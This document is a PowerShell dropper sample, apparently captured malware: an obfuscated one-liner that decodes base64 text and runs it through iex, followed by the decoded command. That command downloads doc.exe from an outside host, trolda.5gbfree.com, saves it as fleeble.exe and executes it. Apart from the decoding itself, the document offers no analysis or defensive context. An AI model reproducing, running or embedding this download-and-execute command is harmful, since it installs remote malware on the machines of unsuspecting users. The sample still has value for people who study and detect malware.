iex([SYStem.tEXt.encODIng]::Utf8.geTstRiNg([SySTEM.coNvERT]::FrOmBAse64stRiNG('CihOZXctT2JqZWN0IHNZU3RlbS5uRXQud2ViQ2xpZW5UKS5ET1dubE9hZGZJbGUoJ2h0dHA6Ly90cm9sZGEuNWdiZnJlZS5jb20vZm9zZWUvZG9jLmV4ZScsJ2ZsZWVibGUuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWJsZS5leGUnCgo=')));exit

##### B64 CONTENT #####


(New-Object sYStem.nEt.webClienT).DOWnlOadfIle('http://trolda.5gbfree.com/fosee/doc.exe','fleeble.exe');Start-Process 'fleeble.exe'

